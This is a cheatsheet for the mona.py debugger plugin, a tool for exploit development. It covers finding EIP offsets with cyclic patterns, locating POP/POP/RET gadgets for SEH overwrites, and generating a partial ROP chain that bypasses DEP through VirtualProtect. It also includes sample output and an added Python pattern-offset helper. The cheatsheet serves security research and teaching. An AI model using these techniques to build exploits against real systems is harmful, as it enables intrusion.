Mona cheatsheet


A short list of mona.py commands, useful to start playing with her :)


=========================== A LITTLE MONA.PY CHEATSHEET ===========================
Last modified: 08/12/2011
Author: [email protected]

*************************** Configuration ***************************

!mona config -set workingfolder c:\logs\%p
    Set the current working directory. Mona will put its output here.
    You can also use -get to retrieve the current working folder.
    (%p means process name)

-cm <criteria>=true/false
    Module criteria: safeseh, aslr, os, rebase

*************************** General searching options ***************************

-cp <criteria1>,<criteria2>,...
    Pointer criteria: nonull, unicode, 00xx00yy, ascii, asciiprint, upper,
    lower, uppernum, lowernum, numeric, alphanum, startswithnull, 00xxyyzz
-cpb <badchars>
    Exclude the specified bad chars from the pointer search
-p <number>
    Number of pointers to return
-x R,W,X,RW,RX,WX,RWX,*
    Only pointers that point into a segment with the specified access level

*************************** Pattern ***************************

!mona pc <size>
    Create a cyclic pattern of <size> bytes. Same as "msf_pattern" in Metasploit.
!mona po <bytes>
    Find the offset of the specified bytes in the cyclic pattern.
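The two pattern commands above can be reproduced outside the debugger. The following is an added example (not mona.py's or Corelan's code) that builds the same Aa0Aa1... cyclic pattern and maps a crashed register value back to its offset, the way !mona po does; register values are assumed to be read as little-endian DWORDs, as in the !mona suggest output on this page.

```python
import string
import struct

# Added example, not mona.py's own code: a small reimplementation of the cyclic
# pattern behind "!mona pc" / "!mona po" (Metasploit's pattern_create /
# pattern_offset), used to triage which offset of a fuzzing input landed in EIP.
UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
MAX_UNIQUE = len(UPPER) * len(LOWER) * len(DIGITS) * 3   # 20280 bytes


def pattern_create(length):
    """Return `length` bytes of the non-repeating pattern Aa0Aa1Aa2...Az9Ba0...

    Every 4-byte window is unique up to MAX_UNIQUE bytes, so a register value
    overwritten by the pattern maps back to exactly one offset in the input.
    """
    if length > MAX_UNIQUE:
        raise ValueError("pattern is only unique up to %d bytes" % MAX_UNIQUE)
    out = bytearray()
    for up in UPPER:
        for lo in LOWER:
            for dg in DIGITS:
                out += (up + lo + dg).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(value, length=MAX_UNIQUE):
    """Map a crashed register back to its offset in the pattern (None if absent).

    `value` is either the int shown in the debugger (EIP = 0x37694136 becomes the
    little-endian bytes b"6Ai7", as mona does) or the raw 4 bytes seen in memory.
    """
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    idx = pattern_create(length).find(needle)
    return idx if idx >= 0 else None


def triage(registers, length):
    """Mirror the per-register lines of "!mona suggest": {name: offset or None}."""
    return {name: pattern_offset(val, length) for name, val in registers.items()}


if __name__ == "__main__":
    # Constructed input: the EIP/EBP values from the "!mona suggest" output on this
    # page, which came from a 1000-byte pattern (assumed sent as the crash payload).
    for reg, off in triage({"EIP": 0x37694136, "EBP": 0x69413569}, 1000).items():
        print("%s overwritten with pattern at offset %s" % (reg, off))
```

A register that holds a value not taken from the pattern (for example 0x41414141) maps to None, which is how you tell an overwrite from an unrelated crash.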

*************************** After a crash with a cyclic pattern payload ***************************

!mona suggest
    Watch the output for lines like these:
      EIP overwritten with normal pattern : 0x37694136 (offset 260)   !!! %EBP+4
      ESP (0x0018f574) points at offset 264 in normal pattern (length 736)
      EBP overwritten with normal pattern : 0x69413569 (offset 256)
      EBX (0x0018f580) points at offset 276 in normal pattern (length 724)

--- output ---
0BADF00D [+] Processing arguments and criteria
0BADF00D - Pointer access level : X
0BADF00D [+] Looking for cyclic pattern in memory
750F0000 Modules C:\Windows\System32\wshtcpip.dll
0BADF00D Cyclic pattern (normal) found at 0x0018f46c (length 1000 bytes)
0BADF00D Cyclic pattern (normal) found at 0x001c3961 (length 1000 bytes)
0BADF00D [+] Examining registers
0BADF00D EIP overwritten with normal pattern : 0x37694136 (offset 260)
0BADF00D ESP (0x0018f574) points at offset 264 in normal pattern (length 736)
0BADF00D EBP overwritten with normal pattern : 0x69413569 (offset 256)
0BADF00D EBX (0x0018f580) points at offset 276 in normal pattern (length 724)
0BADF00D [+] Examining SEH chain
0BADF00D [+] Examining stack
0BADF00D Pointer into normal cyclic pattern at ESP-0x1e8 (-488) : 0x0018f580 : offset 276, length 724
0BADF00D Pointer into normal cyclic pattern at ESP-0x19c (-412) : 0x001c396d : offset 12, length 988
0BADF00D Pointer into normal cyclic pattern at ESP-0x174 (-372) : 0x0018f46c : offset 0, length 1000
0BADF00D Pointer into normal cyclic pattern at ESP-0x170 (-368) : 0x001c396d : offset 12, length 988
0BADF00D Pointer into normal cyclic pattern at ESP-0x164 (-356) : 0x0018f580 : offset 276, length 724
0BADF00D Pointer into normal cyclic pattern at ESP-0x154 (-340) : 0x0018f56c : offset 256, length 744
0BADF00D Pointer into normal cyclic pattern at ESP-0x134 (-308) : 0x0018f580 : offset 276, length 724
0BADF00D Pointer into normal cyclic pattern at ESP-0x114 (-276) : 0x0018f46c : offset 0, length 1000
0BADF00D Pointer into normal cyclic pattern at ESP-0x110 (-272) : 0x0018f46c : offset 0, length 1000
0BADF00D Pointer into normal cyclic pattern at ESP-0x10c (-268) : 0x0018f580 : offset 276, length 724
0BADF00D [+] Preparing log file exploit.rb
0BADF00D - (Re)setting logfile C:\mona_logs\exploit.rb
0BADF00D [+] Generating module info table, hang on...
0BADF00D - Processing modules
0BADF00D - Done. Lets rock n roll.
--- end of output ---

*************************** Finding things in memory ***************************

!mona find
    Find a sequence of bytes in memory.
    Mandatory argument:
    -s <sequence> : the sequence to search for
    Optional arguments:
    -type <type> : type of pattern to search for: bin, asc, ptr, instr, file
    -b <address> : the bottom of the search range
    -t <address> : the top of the search range
    -c : skip consecutive pointers but show the length of the pattern instead
    -p2p : show pointers to pointers to the pattern (might take a while!)
    -r <bytes> : if -p2p is used, also find close pointers; the value is the
                 number of bytes to step backwards for each search

!mona find -type instr -s "jmp ebx" -m ntdll.dll
--- output ---
Search into module ntdll.dll
Search for "jmp ebx" as assembly instruction
Result:
0x77e5172b (b+0x0007172b) : "jmp ebx" | {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: True, Rebase: True, SafeSEH: True, OS: True, v6.1.7600.16385 (C:\Windows\SysWOW64\ntdll.dll)
--- end of output ---

*************************** Assemble instructions ***************************

!mona assemble -s "nop"
    Return the opcodes of the specified instructions (chain several with #).

*************************** Searching for POP/POP/RET instructions (SEH exploiting) ***************************

!mona seh
    Find POP POP RET sequences in program memory. These can be used in SEH exploiting.
--- output ---
0BADF00D [+] Writing results to C:\mona_logs\seh.txt
0BADF00D - Number of pointers of type pop ebx # pop eax # ret: 3
0BADF00D - Number of pointers of type pop esi # pop edi # ret: 3
0BADF00D - Number of pointers of type pop ecx # pop ebx # ret: 1
0BADF00D - Number of pointers of type pop ebx # pop ebp # ret: 3
0BADF00D - Number of pointers of type pop ebx # pop eax # ret 04 : 2
0BADF00D - Number of pointers of type pop ebx # pop ecx # ret: 15
0BADF00D - Number of pointers of type pop ecx # pop edi # ret: 1
0BADF00D - Number of pointers of type pop ebx # pop ecx # ret 0c : 1
0BADF00D - Number of pointers of type pop esi # pop ebx # ret: 6
0BADF00D - Number of pointers of type jmp dword ptr ss:[esp+14] : 1
0BADF00D - Number of pointers of type pop esi # pop ebx # ret 08 : 2
0BADF00D - Number of pointers of type call dword ptr ss:[ebp-04] : 1
0BADF00D - Number of pointers of type pop esi # pop ebx # ret 04 : 2
0BADF00D - Number of pointers of type call dword ptr ss:[esp+14] : 1
0BADF00D - Number of pointers of type pop ebx # pop ecx # ret 04 : 14
0BADF00D - Number of pointers of type call dword ptr ss:[ebp-18] : 1
0BADF00D - Number of pointers of type pop edi # pop ebx # ret: 1
[..]
--- end of output ---

*************************** ROP based exploit ***************************

!mona rop -m <module>
    Analyze memory and prepare several lists: valid ROP gadgets (any INSTR + RET
    sequence), stack pivots and ROP functions. Also generate a ROP chain aimed at
    bypassing DEP (a call to VirtualProtect using the PUSHAD technique) and
    suggest which addresses need to be fixed to make it work.

NOTE:
    Watch "C:\mona_logs\rop_suggestion.txt" for a clear gadget list.
    Watch "C:\mona_logs\rop_virtualprotect.txt" for a starting point for your
    ROP payload (aimed at DEP bypass).
    Watch "C:\mona_logs\stack_pivot.txt" for a list of gadgets that change ESP.

--- output ---
---------- Mona command started on 2011-07-21 10:58:09 ----------
[..]
VirtualProtect register structure (PUSHAD technique)
----------------------------------------------------
EAX = NOP (0x90909090)
ECX = lpOldProtect (Writable ptr)
EDX = NewProtect (0x40)
EBX = Size
ESP = lPAddress (automatic)
EBP = ReturnTo (ptr to jmp esp - run !mona jmp -r esp -n -o)
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)

VirtualProtect() pushad rop chain
------------------------------------
rop_gadgets = [
  0x00404880,  # POP ECX # RETN (server.exe)
  0x????????,  # edx)
  0x00404a84,  # POP EAX # RETN (server.exe)
  0x90909090,  # NOPS (-> eax)
  0x004022e0,  # PUSHAD # RETN (server.exe)
  # rop chain generated by mona.py
  # note : this chain may not work out of the box
  # you may have to change order or fix some gadgets,
  # but it should give you a head start
].pack("V*")
[..]
--- end of output ---

======================================================================================
Reference:
https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/
https://www.corelan.be/index.php/2011/05/12/hack-notes-ropping-eggs-for-breakfast/